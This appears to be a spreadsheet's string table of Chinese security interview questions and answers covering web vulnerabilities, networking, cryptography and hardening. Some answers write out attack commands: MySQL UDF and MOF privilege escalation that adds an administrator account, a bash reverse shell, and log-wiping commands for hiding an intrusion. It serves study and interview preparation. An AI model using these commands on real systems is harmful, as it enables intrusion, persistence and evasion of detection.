针对token的攻击，一是对它本身的攻击，重放测试一次性、分析加密规则、校验方式是否正确等，二是结合信息泄露漏洞对它的获取，结合着发起组合攻击
信息泄露有可能是缓存、日志、get，也有可能是利用跨站
很多跳转登录的都依赖token，有一个跳转漏洞加反射型跨站就可以组合成登录劫持了
另外也可以结合着其它业务来描述token的安全性及设计不好怎么被绕过比如抢红包业务之类的
</t>
  </si>
  <si>
    <t>SSRF</t>
  </si>
  <si>
    <t xml:space="preserve">SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）
SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容，加载指定地址的图片，下载等等。
检测SSRF漏洞的验证方法：
1）因为SSRF漏洞是让服务器发送请求的安全漏洞，所以我们就可以通过抓包分析发送的请求是否是由服务器的发送的，从而来判断是否存在SSRF漏洞
2）在页面源码中查找访问的资源地址 ，如果该资源地址类型为 http://www.baidu.com/xxx.php?image=（地址）的就可能存在SSRF漏洞
SSRF漏洞的成因 防御 绕过
成因：模拟服务器对其他服务器资源进行请求，没有做合法性验证。
利用：构造恶意内网IP做探测，或者使用其余所支持的协议对其余服务进行攻击。
防御：禁止跳转，限制协议，内外网限制，URL限制。
绕过：使用不同协议，针对IP，IP格式的绕过，针对URL，恶意URL增添其他字符，@之类的。301跳转+dns rebindding
</t>
  </si>
  <si>
    <t xml:space="preserve">文件上传和文件上传漏洞原理
</t>
  </si>
  <si>
    <t xml:space="preserve">由于程序员在对用户文件上传部分的控制不足或者处理缺陷，而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件
常见的上传绕过方式
前端js验证：禁用js/burp改包
大小写
双重后缀名
过滤绕过 pphphp-&gt;php
文件上传防护
文件上传目录设置为不可执行
使用白名单判断文件上传类型
用随机数改写文件名和路径
</t>
  </si>
  <si>
    <t>审查上传点的元素有什么意义？</t>
  </si>
  <si>
    <t>有些站点的上传文件类型的限制是在前端实现的，这时只要增加上传类型就能突破限制了。</t>
  </si>
  <si>
    <t>文件包含</t>
  </si>
  <si>
    <t xml:space="preserve">原理
引入一段用户能控制的脚本或代码，并让服务器端执行
（1）include()等函数通过动态变量的方式引入需要包含的文件；
（2）用户能够控制该动态变量。
导致文件包含的函数
PHP：include(), include_once(), require(), re-quire_once(), fopen(), readfile(), …
JSP/Servlet：ava.io.File(), java.io.Fil-eReader(), …
ASP：include file, include virtual,
本地文件包含
能够打开并包含本地文件的漏洞，被称为本地文件包含漏洞
</t>
  </si>
  <si>
    <t xml:space="preserve">XXE逻辑漏洞金融行业常见逻辑漏洞
</t>
  </si>
  <si>
    <t xml:space="preserve">单针对金融业务的
主要是数据的篡改(涉及金融数据，或部分业务的判断数据)，由竞争条件或者设计不当引起的薅羊毛，交易/订单信息泄露，水平越权对别人的账户查看或恶意操作，交易或业务步骤绕过。
溢出
</t>
  </si>
  <si>
    <t>中间人攻击</t>
  </si>
  <si>
    <t xml:space="preserve">中间人攻击是一个（缺乏）相互认证的攻击；由于客户端与服务器之间在SSL握手的过程中缺乏相互认证而造成的漏洞
防御中间人攻击的方案通常基于一下几种技术
1.公钥基础建设PKI
使用PKI相互认证机制，客户端验证服务器，服务器验证客户端；上述两个例子中都是只验证服务器，这样就造成了SSL握手环节的漏洞，而如果使用相互认证的的话，基本可以更强力的相互认证
2.延迟测试
使用复杂加密哈希函数进行计算以造成数十秒的延迟；如果双方通常情况下都要花费20秒来计算，并且整个通讯花费了60秒计算才到达对方，这就能表明存在第三方中间人。
3.使用其他形式的密钥交换形式
</t>
  </si>
  <si>
    <t>ARP欺骗</t>
  </si>
  <si>
    <t xml:space="preserve">每台主机都有一个ARP缓存表，缓存表中记录了IP地址与MAC地址的对应关系，而局域网数据传输依靠的是MAC地址。
在ARP缓存表机制存在一个缺陷，就是当请求主机收到ARP应答包后，不会去验证自己是否向对方主机发送过ARP请求包，就直接把这个返回包中的IP地址与MAC地址的对应关系保存进ARP缓存表中，如果原有相同IP对应关系，原有的则会被替换。这样攻击者就有了偷听主机传输的数据的可能
防护
1.在主机绑定网关MAC与IP地址为静态（默认为动态），命令：arp -s 网关IP 网关MAC
2.在网关绑定主机MAC与IP地址
3.使用ARP防火墙
DDOS攻击
Ddos原理
利用合理的请求造成资源过载，导致服务不可用
</t>
  </si>
  <si>
    <t>syn洪流的原理</t>
  </si>
  <si>
    <t>伪造大量的源IP地址，分别向服务器端发送大量的SYN包，此时服务器端会返回SYN/ACK包，因为源地址是伪造的，所以伪造的IP并不会应答，
服务器端没有收到伪造IP的回应，会重试3～5次并且等待一个SYNTime（一般为30秒至2分钟），如果超时则丢弃这个连接。攻击者大量发送
这种伪造源地址的SYN请求，服务器端将会消耗非常多的资源（CPU和内存）来处理这种半连接，同时还要不断地对这些IP进行SYN+ACK重试。
最后的结果是服务器无暇理睬正常的连接请求，导致拒绝服务。</t>
  </si>
  <si>
    <t>CC攻击原理</t>
  </si>
  <si>
    <t>对一些消耗资源较大的应用页面不断发起正常的请求，以达到消耗服务端资源的目的</t>
  </si>
  <si>
    <t>DDOS防护</t>
  </si>
  <si>
    <t>SYN Cookie/SYN Proxy、safereset等算法。SYN Cookie的主要思想是为每一个IP地址分配一个“Cookie”，并统计每个IP地址的访问频率。
如果在短时间内收到大量的来自同一个IP地址的数据包，则认为受到攻击，之后来自这个IP地址的包将被丢弃。</t>
  </si>
  <si>
    <t>提权</t>
  </si>
  <si>
    <t xml:space="preserve">mysql两种提权方式
udf提权,mof提权
Mysql_UDF提权
要求:
1.目标系统是Windows(Win2000,XP,Win2003)；
2.拥有MYSQL的某个用户账号，此账号必须有对mysql的insert和delete权限以创建和抛弃函数
3.有root账号密码
导出udf:
MYSQL 5.1以上版本，必须要把udf.dll文件放到MYSQL安装目录下的lib\plugin文件夹下才能创建自定义函数
可以再mysql里输入
select @@basedir
show variables like ‘%plugins%’ 寻找mysql安装路径
提权:
使用SQL语句创建功能函数。语法：Create Function 函数名（函数名只能为下面列表中的其中之一）returns string soname ‘导出的DLL路径’；
create function cmdshell returns string soname ‘udf.dll’
select cmdshell(‘net user arsch arsch /add’);
select cmdshell(‘net localgroup administrators arsch /add’);
drop function cmdshell;
该目录默认是不存在的，这就需要我们使用webshell找到MYSQL的安装目录，并在安装目录下创建lib\plugin文件夹，然后将udf.dll文件导出到该目录即可。
Mysql mof提权
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};
其中的第18行的命令，上传前请自己更改。
2、执行load_file及into dumpfile把文件导出到正确的位置即可。
select load file('c:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mov'
执行成功后，即可添加一个普通用户，然后你可以更改命令，再上传导出执行把用户提升到管理员权限，然后3389连接之就ok了。
</t>
  </si>
  <si>
    <t xml:space="preserve">特殊漏洞
1、Struts2-045
2、Redis未授权访问
3、产生原因
</t>
  </si>
  <si>
    <t xml:space="preserve">Redis 默认情况下，会绑定在 0.0.0.0:6379，这样将会将 Redis 服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法，可以成功在 Redis 服务器上写入公钥，进而可以使用对应私钥直接登录目标服务器
利用条件和方法
条件:
redis服务以root账户运行
redis无密码或弱密码进行认证
redis监听在0.0.0.0公网上
方法:
通过 Redis 的 INFO 命令, 可以查看服务器相关的参数和敏感信息, 为攻击者的后续渗透做铺垫
上传SSH公钥获得SSH登录权限
通过crontab反弹shell
slave主从模式利用
修复
密码验证
降权运行
限制ip/修改端口
Jenkins未授权访问
攻击者通过未授权访问进入脚本命令执行界面执行攻击指令
println “ifconfig -a”.execute().text 执行一些系统命令,利用wget下载webshell
</t>
  </si>
  <si>
    <t>MongoDB未授权访问</t>
  </si>
  <si>
    <t xml:space="preserve">开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,而且可以远程访问数据库，登录的用户可以通过默认端口无需密码对数据库进行增、删、改、查等任意高危操作。
防护
1、为MongoDB添加认证：
1)MongoDB启动时添加–auth参数
2)给MongoDB添加用户：
use admin #使用admin库
db.addUser(“root”, “123456”) #添加用户名root密码123456的用户
db.auth(“root”,“123456”) #验证下是否添加成功，返回1说明成功
2、禁用HTTP和REST端口
MongoDB自身带有一个HTTP服务和并支持REST接口。在2.6以后这些接口默认是关闭的。mongoDB默认会使用默认端口监听web服务，一般不需要通过web方式进行远程管理，建议禁用。修改配置文件或在启动的时候选择–nohttpinterface 参数nohttpinterface=false
3、限制绑定IP
启动时加入参数
–bind_ip 127.0.0.1
或在/etc/mongodb.conf文件中添加以下内容：
bind_ip = 127.0.0.1
</t>
  </si>
  <si>
    <t>Memcache未授权访问</t>
  </si>
  <si>
    <t xml:space="preserve">Memcached是一套常用的key-value缓存系统，由于它本身没有权限控制模块，所以对公网开放的Memcache服务很容易被攻击者扫描发现，攻击者通过命令交互可直接读取Memcached中的敏感信息。
利用
1、登录机器执行netstat -an |more命令查看端口监听情况。回显0.0.0.0:11211表示在所有网卡进行监听，存在memcached未授权访问漏洞。
2、telnet 11211，或nc -vv 11211，提示连接成功表示漏洞存在
漏洞加固
1、设置memchached只允许本地访问
2、禁止外网访问Memcached 11211端口
3、编译时加上–enable-sasl，启用SASL认证
</t>
  </si>
  <si>
    <t>FFMPEG 本地文件读取漏洞</t>
  </si>
  <si>
    <t xml:space="preserve">原理
通过调用加密API将payload加密放入一个会被执行的段字节中。但是具体回答工程中我只回答道了SSRF老洞，m3u8头，偏移量，加密。
</t>
  </si>
  <si>
    <t>常用WEB开发JAVA框架</t>
  </si>
  <si>
    <t>STRUTS,SPRING</t>
  </si>
  <si>
    <t>常见的java框架漏洞</t>
  </si>
  <si>
    <t xml:space="preserve">其实面试官问这个问题的时候我不太清楚他要问什么，我提到struts的045 048，java常见反序列化。
045 错误处理引入了ognl表达式
048 封装action的过程中有一步调用getstackvalue递归获取ognl表达式
反序列化 操作对象，通过手段引入。apache common的反射机制、readobject的重写，其实具体的我也记不清楚。。。然后这部分就结束了
</t>
  </si>
  <si>
    <t>同源策略</t>
  </si>
  <si>
    <t>同源策略限制不同源对当前document的属性内容进行读取或设置。
不同源的区分：协议、域名、子域名、IP、端口，以上有不同时即不同源。</t>
  </si>
  <si>
    <t xml:space="preserve">Jsonp安全攻防技术，怎么写Jsonp的攻击页面？
涉及到Jsonp的安全攻防内容
</t>
  </si>
  <si>
    <t xml:space="preserve">JSON劫持、Callback可定义、JSONP内容可定义、Content-type不为json。
攻击页面
JSON劫持，跨域劫持敏感信息，页面类似于
function wooyun(v){
    alert(v.username);
}
Content-type不正确情况下，JSONP和Callback内容可定义可造成XSS。
JSONP和FLASH及其他的利用参照知道创宇的JSONP安全攻防技术。
</t>
  </si>
  <si>
    <t>php中命令执行涉及到的函数</t>
  </si>
  <si>
    <t>system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()</t>
  </si>
  <si>
    <t>PHP弱类型</t>
  </si>
  <si>
    <t xml:space="preserve">"==" 在进行比较的时候，会先将字符串类型转化成相同，再比较
如果比较一个数字和字符串或者比较涉及到数字内容的字符串，则字符串会被转换成数值并且比较按照数值来进行
0e开头的字符串等于0
</t>
  </si>
  <si>
    <t>各种数据库文件存放的位置</t>
  </si>
  <si>
    <t xml:space="preserve">mysql:/usr/local/mysql/data/ C:\ProgramData\MySQL\MySQL Server 5.6\Data
oracle:$ORACLE_BASE/oradata/$ORACLE_SID/
</t>
  </si>
  <si>
    <t>如何清理日志</t>
  </si>
  <si>
    <t>meterpreter: clearev</t>
  </si>
  <si>
    <t>入侵 Linux 服务器后需要清除哪些日志？</t>
  </si>
  <si>
    <t xml:space="preserve">web日志，如apache的access.log,error.log。直接将日志清除过于明显,一般使用sed进行定向清除
e.g. sed -i -e ‘/192.169.1.1/d’
history命令的清除，也是对~/.bash_history进行定向清除
wtmp日志的清除，/var/log/wtmp
登录日志清除 /var/log/secure
</t>
  </si>
  <si>
    <t>反弹 shell 的常用命令？一般常反弹哪一种 shell？为什么?</t>
  </si>
  <si>
    <t xml:space="preserve">bash -i&gt;&amp;/dev/tcp/x.x.x.x/4444 0&gt;&amp;1
</t>
  </si>
  <si>
    <t>查看当前端口连接的命令有哪些？netstat 和 ss 命令的区别和优缺点</t>
  </si>
  <si>
    <t xml:space="preserve">netstat -antp ss -l
ss的优势在于它能够显示更多更详细的有关TCP和连接状态的信息，而且比netstat更快速更高效。
</t>
  </si>
  <si>
    <t>通过Linux系统的/proc目录 ，能够获取到哪些信息，这些信息可以在安全上有哪些应用？</t>
  </si>
  <si>
    <t>ls /proc 系统信息，硬件信息，内核版本，加载的模块，进程</t>
  </si>
  <si>
    <t>linux系统中，检测哪些配置文件的配置项，能够提升SSH的安全性？</t>
  </si>
  <si>
    <t xml:space="preserve">/etc/ssh/sshd___config
iptables配置
</t>
  </si>
  <si>
    <t>如何一条命令查看文件内容最后一百行？</t>
  </si>
  <si>
    <t>tail -n 100 filename</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>如何加固一个域环境下的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>桌面工作环境？请给出你的思路。</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>AES</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>／</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>DES</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>的具体工作步骤</t>
    </r>
  </si>
  <si>
    <t>RSA算法
加密:
$$
密文＝明文^EmodN
$$
RSA加密是对明文的E次方后除以N后求余数的过程
$$
公钥＝(E,N)
$$
解密:
$$
明文＝密文^DmodN
$$
$$
私钥＝(D,N)
$$</t>
  </si>
  <si>
    <t>三个参数n,e1,e2
n是两个大质数p,q的积
分组密码的加密模式
如何生成一个安全的随机数？</t>
  </si>
  <si>
    <t>引用之前一个学长的答案，可以通过一些物理系统生成随机数，如电压的波动、磁盘磁头读/写时的寻道时间、空中电磁波的噪声等。</t>
  </si>
  <si>
    <t>SSL握手过程</t>
  </si>
  <si>
    <t>建立TCP连接、客户端发送SSL请求、服务端处理SSL请求、客户端发送公共密钥加密过的随机数据、服务端用私有密钥解密加密后的随机数据并协商暗号、服务端跟客户端利用暗号生成加密算法跟密钥key、之后正常通信。
这部分本来是忘了的，但是之前看SSL Pinning的时候好像记了张图在脑子里，挣扎半天还是没敢确定，遂放弃。。。</t>
  </si>
  <si>
    <t>对称加密与非对称加密的不同，分别用在哪些方面</t>
  </si>
  <si>
    <t>TCP三次握手的过程以及对应的状态转换</t>
  </si>
  <si>
    <t>（1）客户端向服务器端发送一个SYN包，包含客户端使用的端口号和初始序列号x；
（2）服务器端收到客户端发送来的SYN包后，向客户端发送一个SYN和ACK都置位的TCP报文，包含确认号xx1和服务器端的初始序列号y；
（3）客户端收到服务器端返回的SYNSACK报文后，向服务器端返回一个确认号为yy1、序号为xx1的ACK报文，一个标准的TCP连接完成。</t>
  </si>
  <si>
    <t>TCP和UDP协议区别</t>
  </si>
  <si>
    <t>tcp面向连接,udp面向报文
tcp对系统资源的要求多
udp结构简单
tcp保证数据完整性和顺序，udp不保证</t>
  </si>
  <si>
    <t>https的建立过程</t>
  </si>
  <si>
    <t>1、客户端发送请求到服务器端
2、服务器端返回证书和公开密钥，公开密钥作为证书的一部分而存在
3、客户端验证证书和公开密钥的有效性，如果有效，则生成共享密钥并使用公开密钥加密发送到服务器端
4、服务器端使用私有密钥解密数据，并使用收到的共享密钥加密数据，发送到客户端
5、客户端使用共享密钥解密数据
6、SSL加密建立</t>
  </si>
  <si>
    <t>wireshark简单的过滤规则</t>
  </si>
  <si>
    <t>过滤ip:
过滤源ip地址:ip.src==1.1.1.1;,目的ip地址:ip.dst==1.1.1.1;
过滤端口:
过滤80端口:tcp.port==80,源端口:tcp.srcport==80,目的端口:tcp.dstport==80
协议过滤:
直接输入协议名即可,如http协议http
http模式过滤:
过滤get/post包http.request.mothod==”GET/POST”</t>
  </si>
  <si>
    <t>简述路由器交换机、防火墙等网络设备常用的几个基础配置加固项，以及配置方法。</t>
  </si>
  <si>
    <t>文件上传有哪些防护方式</t>
  </si>
  <si>
    <t>用什么扫描端口，目录</t>
  </si>
  <si>
    <t>nmap</t>
  </si>
  <si>
    <t>如何判断注入</t>
  </si>
  <si>
    <t>注入有防护怎么办</t>
  </si>
  <si>
    <t>绕过</t>
  </si>
  <si>
    <t>有没有写过tamper</t>
  </si>
  <si>
    <t>没有</t>
  </si>
  <si>
    <t>3306 1433 8080是什么端口</t>
  </si>
  <si>
    <t>3306 端口，是 MySQL 数据库的默认端口，用于 MySQL 对外提供服务。
1433 端口，是 SQL Server 默认的端口
8080 端口同 80 端口，是被用于 WWW 代理服务的。另外 Apache Tomcat web server 安装后，默认的服务端口就是 8080。</t>
  </si>
  <si>
    <t>计算机网络从物理层到应用层xxxx</t>
  </si>
  <si>
    <t>物理层：利用传输介质为数据链路层提供物理连接，实现比特流的透明传输。
数据链路层：接收来自物理层的位流形式的数据，并封装成帧，传送到上一层
网络层：将网络地址翻译成对应的物理地址，并通过路由选择算法为分组通过通信子网选择最适当的路径。
传输层：在源端与目的端之间提供可靠的透明数据传输
会话层：负责在网络中的两节点之间建立、维持和终止通信
表示层：处理用户信息的表示问题，数据的编码，压缩和解压缩，数据的加密和解密
应用层：为用户的应用进程提供网络通信服务</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/l1pe1/p/9213060.html</t>
  </si>
  <si>
    <t>有没有web服务开发经验</t>
  </si>
  <si>
    <t>有没有用过xss平台</t>
  </si>
  <si>
    <t>有</t>
  </si>
  <si>
    <t>网站渗透的流程</t>
  </si>
  <si>
    <t>1、确定目标；2、信息搜集；3、漏洞探测；4、漏洞利用，获得webshell；5、内网转发、内网渗透；6、痕迹清除；7、撰写报告</t>
  </si>
  <si>
    <t>mysql两种提权方式（udf，？）</t>
  </si>
  <si>
    <t>mof提权，udf提权（详情见第32）</t>
  </si>
  <si>
    <t>常见加密方式xxx</t>
  </si>
  <si>
    <t>单向散列加密 MD5、SHA、MAC
对称加密 AES、DES
非对称加密 RSA、RSA2</t>
  </si>
  <si>
    <t>ddos如何防护</t>
  </si>
  <si>
    <t>开启全站CDN，增加带宽，买ADS设备，买DDoS防火墙，用云端和本地代替等</t>
  </si>
  <si>
    <t>有没有抓过包，会不会写wireshark过滤规则</t>
  </si>
  <si>
    <t>清理日志要清理哪些</t>
  </si>
  <si>
    <t>Linux /var/log
Windows %sys temroot%\system32\config</t>
  </si>
  <si>
    <t>你知道哪些能拿下一个网站的漏洞</t>
  </si>
  <si>
    <t>永恒之蓝、weblogic、redis未授权访问漏洞</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>order by</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>注入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> limit</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>注入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>后面跟的函数有什么不同</t>
    </r>
  </si>
  <si>
    <t>limit后面能够拼接的函数只有into和procedure</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">order by </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>含义</t>
    </r>
  </si>
  <si>
    <t>ORDER BY 语句用于根据指定的列对结果集进行排序。
ORDER BY 语句默认按照升序对记录进行排序。</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>sqlserver</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>注入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>css</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>xss</t>
    </r>
  </si>
  <si>
    <t>https://m.baidu.com/from=844b/bd_page_type=1/ssid=835db7abb8e7323737a270/uid=0/pu=usm%400%2Csz%401320_2001%2Cta%40iphone_1_14.4_25_14.0/baiduid=24E02FDDB98DA27BB928D14C761D60CA/w=0_10_/t=iphone/l=1/tc?clk_type=1&amp;vit=osres&amp;l=1&amp;baiduid=24E02FDDB98DA27BB928D14C761D60CA&amp;t=iphone&amp;ref=www_iphone&amp;from=844b&amp;ssid=835db7abb8e7323737a270&amp;lid=9317663745153111717&amp;bd_page_type=1&amp;pu=usm%400%2Csz%401320_2001%2Cta%40iphone_1_14.4_25_14.0&amp;order=1&amp;fm=alop&amp;isAtom=1&amp;waplogo=1&amp;is_baidu=0&amp;tj=www_normal_1_0_10_title&amp;m=8&amp;cltj=normal_title&amp;asres=1&amp;title=css中的xss漏洞_kuiyuexiang的专栏-CSDN博客&amp;clk_info=%7B%22tplname%22%3A%22www_normal%22%2C%22srcid%22%3A1599%2C%22t%22%3A1614910592551%2C%22xpath%22%3A%22div-article-section-div-div-section-div-div-div-a-div-div%22%7D&amp;wd=&amp;eqid=814efdcf226316a5100000046041947c&amp;w_qd=IlPT2AEptyoA_yk5sxod5QsrrBZUmIWqFQW&amp;bdver=2&amp;tcplug=1&amp;dict=-1&amp;sec=10586&amp;di=0c4f947a5765f7c1&amp;bdenc=1&amp;tch=124.0.261.228.0.0&amp;nsrc=k4638UOP4j5EzwRkgkRceuhcGPz8lrCRugo%2BqJFdrCUtMKYtNzGdBpHR49J3XlkW7Mvuc34qugqA0OiR1Fs2Yolet2X%2F4sEhnl9EfjeVce5L%2FmJlL6NHFf2SVmp8lwYR</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>flash</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>xss</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>原理</t>
    </r>
  </si>
  <si>
    <t>https://www.secpulse.com/archives/44299.html</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>过滤了单引号</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>into outfile</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>还能用吗</t>
    </r>
  </si>
  <si>
    <t>不行，绝对路径必须有单引号，十六进制和ASCII都不行</t>
  </si>
  <si>
    <t>除了script ,html事件之外还有哪些存在xss的地方</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>iis</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>拒绝服务原理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
      </rPr>
      <t>ssrf</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>除了探测主机外如何进一步进行攻击</t>
    </r>
  </si>
  <si>
    <t>1、可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner 信息
2、攻击运行在内网或本地的应用程序
3、对内网 WEB 应用进行指纹识别，通过访问默认文件实现(如：readme文件)
4、攻击内外网的 web 应用，主要是使用 GET 参数就可以实现的攻击(如：Struts2，sqli)
5、下载内网资源(如：利用file协议读取本地文件等)
6、进行跳板
7、无视cdn
8、利用Redis未授权访问，HTTP CRLF注入实现getshell</t>
  </si>
  <si>
    <t>uname -a ‘-a’参数可控如何执行多条指令</t>
  </si>
  <si>
    <t>什么是SQL注入攻击</t>
  </si>
  <si>
    <t xml:space="preserve">攻击者在HTTP请求中注入恶意的SQL代码，服务器使用参数构建数据库SQL命令时，恶意SQL被一起构造，并在数据库中执行。
</t>
  </si>
  <si>
    <t>什么是XSS攻击</t>
  </si>
  <si>
    <t>跨站点脚本攻击，指攻击者通过篡改网页，嵌入恶意脚本程序，在用户浏览网页时，控制用户浏览器进行恶意操作的一种攻击方式。如何防范XSS攻击</t>
  </si>
  <si>
    <t>DDos 攻击</t>
  </si>
  <si>
    <t>客户端向服务端发送请求链接数据包，服务端向客户端发送确认数据包，客户端不向服务端发送确认数据包，服务器一直等待来自客户端的确认
没有彻底根治的办法，除非不使用TCP
DDos 预防：
1）限制同时打开SYN半链接的数目
2）缩短SYN半链接的Time out 时间
3）关闭不必要的服务</t>
  </si>
  <si>
    <t>arp协议的工作原理</t>
  </si>
  <si>
    <t>地址解析协议，即ARP（Address Resolution Protocol），是根据IP地址获取物理地址的一个TCP/IP协议。
1.发送ARP请求的以太网数据帧 广播 到以太网上的每个主机，ARP请求帧中包含了目的主机的IP地址。
2.目的主机收到了该ARP请求之后，会发送一个ARP应答，里面包含了目的主机的MAC地址。</t>
  </si>
  <si>
    <t>什么是RARP？工作原理</t>
  </si>
  <si>
    <t>概括： 反向地址转换协议，网络层协议，RARP与ARP工作方式相反。 RARP使只知道自己硬件地址的主机能够知道其IP地址。RARP发出要反向解释的物理地址并希望返回其IP地址，应答包括能够提供所需信息的RARP服务器发出的IP地址。</t>
  </si>
  <si>
    <t>dns是什么？dns的工作原理</t>
  </si>
  <si>
    <t>将主机域名转换为ip地址，属于应用层协议，使用UDP传输。（应用层协议）</t>
  </si>
  <si>
    <t>rip协议是什么？rip的工作原理</t>
  </si>
  <si>
    <t>RIP动态路由选择协议（网络层协议）
RIP是一种基于距离矢量（Distance-Vector）算法的协议，它使用跳数（Hop Count）作为度量来衡量到达目的网络的路由距离。
RIP的协议端口为520 UDP</t>
  </si>
  <si>
    <t>OSPF协议？OSPF的工作原理</t>
  </si>
  <si>
